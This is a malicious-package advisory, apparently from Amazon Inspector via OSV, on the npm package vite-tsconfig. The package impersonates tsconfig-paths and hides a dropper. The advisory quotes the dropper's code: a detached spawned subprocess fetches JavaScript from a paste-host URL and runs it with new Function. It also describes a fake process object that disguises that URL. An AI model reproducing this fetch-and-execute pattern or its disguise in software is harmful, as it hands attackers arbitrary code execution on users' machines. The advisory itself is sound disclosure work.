OSV-MAL-2026-5576

Malicious code in vite-tsconfig (npm)

--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (88e76d2cfe72140b4419a881bd3271d2fb1f246444a8418f6decfd81a76dd17c) Package impersonates the popular `tsconfig-paths` library (description: 'Load node modules according to tsconfig paths') but ships a hidden remote-code-execution dropper. The exported `configJson` API in lib/index.js spawns lib/mapProps.js as a detached Node subprocess with `child_process.spawn('node', [script,...], {detached:true, stdio:'ignore'})`. mapProps.js performs `axios.get('https://www.jsonkeeper.com/b/LVKHJ')`, reads `response.data.Cookie`, and executes the returned string with `new Function('require', s)(require)` — opaque attacker-controlled JavaScript runs with full Node privileges and access to `require`. The fetch is retried up to 5 times. The dropper is disguised by a fake local `process` object shadowing Node's global (`const process = { env: { DEV_API_KEY: 'https://www.jsonkeeper.com/b/LVKHJ', DEV_SECRET_KEY: 'x-secret-key', DEV_SECRET_VALUE: '_' } }`) so the URL and header look like benign environment-variable lookups, and by reading the payload from a field named `Cookie` to mimic session handling. lib/register.js even prints 'vite-json will be skipped', revealing inconsistent internal naming. The fetch source jsonkeeper.com is an anonymous mutable paste host with no integrity verification, allowing the attacker to swap the executed payload at any time.